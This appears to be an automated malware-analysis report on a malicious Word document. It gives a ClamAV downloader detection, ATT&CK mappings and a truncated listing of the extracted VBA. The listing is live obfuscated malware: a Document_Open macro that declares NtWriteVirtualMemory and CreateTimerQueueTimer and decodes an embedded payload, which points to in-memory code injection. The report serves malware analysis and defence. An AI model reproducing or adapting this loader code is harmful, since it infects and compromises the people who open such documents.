Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The presence of the 'Doc.Downloader.Macro' ClamAV detection strongly suggests the macro's purpose is to download a secondary payload. While the VBA code is partially obfuscated, the Document_Open subroutine is present and calls other functions, indicating an attempt to execute malicious code.
Heuristics (4)
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12261 bytes | 7205fa046df3a1badb3a9e8d7245b55ef1d524acfa79adcd0c8de43c9f24b091 |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
mongoloid
coxsackievirus = 28 + 25
Pmt 0, coxsackievirus, 14044, 12664, 7
End Sub
Attribute VB_Name = "azalea"
Attribute VB_Base = "0{E78F806D-D696-4FBD-BDD1-6EF6C9F2F02E}{E8FF2CCF-B587-42D4-B473-777EBC978C92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vibration"
#If (8 - 68 + 460 + 42 - 95 + 353) > ((106 - 119 + 333) - (74 - 61 + 527) * 1) And ((87 - 123 + 64) - (43 - 9 - 6)) * 2 < (Win64) Then
Public Declare PtrSafe Function glissando _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (macaca As Any, ByVal diminutiveness As Any, ByVal ritualistic As Any, ByVal citrange As Any, ByVal foundered As Any, ByVal pennon As Any, ByVal addison As Any) As Long
Public Declare PtrSafe Function mournful _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal anarchist As Any, ByVal alkyd As Any, ByVal dubiety As Any, ByVal cynodontia As Any, ByVal tiliaceae As Any) As LongPtr
#End If
Function astrophyton(alleviation) As String
Dim entrap As String
Dim carvel(63) As Long
Dim mrs As Long
Dim crammer As Long
Dim alienation(63) As Long
Dim cockahoop As Long
Dim basotho(63) As Long
abstractor = abstractor * 4
Dim cebidae As Long
Dim calliphoridae() As Byte
Dim toucan As Integer
Dim diseased(6962) As Byte
montee = 10 - 43 + 258081
Dim clatter As Long
heightening = 95 - 35 + 16515012
confute = 112 - 67 + 19
opposition = 45 - 11 + 65246
barrelhouse = 49 - 50 + 4033
Dim montgomery As String
punch = 103 - 98 + 4091
anomalist = 112 - 3 + 65427
bantling = 22 - 74 + 115
Dim arrogate As Variant
endeavor = 119 - 61 + 16711622
seder = 67 - 1 + 189
angel = 112 - 9 + 262041
include = 12 - 34 + 278
Dim justification As Integer
douloureux = 123 - 13 + 7733
Dim uncommon() As Byte
uncommon = VBA.StrConv(alleviation, 120 + 8)
commix = 20 + 7
Pmt 0, commix, 9660, 22523, 6
dei = 7843
artistical = vbKeyShift - 12
For sphyrapicus = 0 To dei
If sphyrapicus Mod 2 = 0 Then
uncommon(sphyrapicus) = uncommon(sphyrapicus) - artistical
Else
uncommon(sphyrapicus) = uncommon(sphyrapicus) - (artistical - 1)
End If
Next sphyrapicus
glib = 19 + 49
Pmt 0, glib, 31624, 13508, 4
toucan = 0
sewage = maine
For mrs = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
basotho(mrs) = gasconading(mrs, confute, 63)
carvel(mrs) = gasconading(mrs, punch, 63)
alienation(mrs) = gasconading(mrs, angel, 63)
Next mrs
oscilloscope = 51 + 23
Pmt 0, oscilloscope, 7655, 25045, 3
calliphoridae = uncommon
scandalously = 84 - 48 - 32
scrubbed = 59 + 29
Pmt 0, scrubbed, 37860, 39732, 2
charybdis = 18 - 79 + 64
eightspot = eightspot
homonymy = Rnd(406)
deceitful = charybdis + 1
blighia = 78 - 3 - 73
For cebidae = 0 To dei
actual = calliphoridae(cebidae)
hippodrome = calliphoridae(cebidae + 2)
satrap = carvel(sewage(calliphoridae(cebidae + 1)))
callowness = basotho(sewage(hippodrome)) + sewage(calliphoridae(cebidae + charybdis))
cockahoop = alienation(sewage(actual)) + satrap + callowness
mrs = gasconading(cockahoop, endeavor, 55)
diseased(crammer) = gasconading(mrs, anomalist, 45)
mrs = gasconading(cockahoop, opposition, 55)
diseased(crammer + 1) = gasconading(mrs, include, 45)
diseased(crammer + blighia) = gasconading(cockahoop, seder, 55)
crammer = crammer + blighia + 1
cebidae = cebidae + 3
Next
astrophyton = diseased
End Function
Function alderman(anemometry, suffragette, reword)
Dim scaphiopus As Long
Dim nyamwezi As String
Dim doubleedged As Long
Dim mentum As Integer
Dim brawl As Long
Dim justified As Variant
Dim midterm As Long
Dim wahrheit As Long
Dim monroe As Long
... (truncated)
```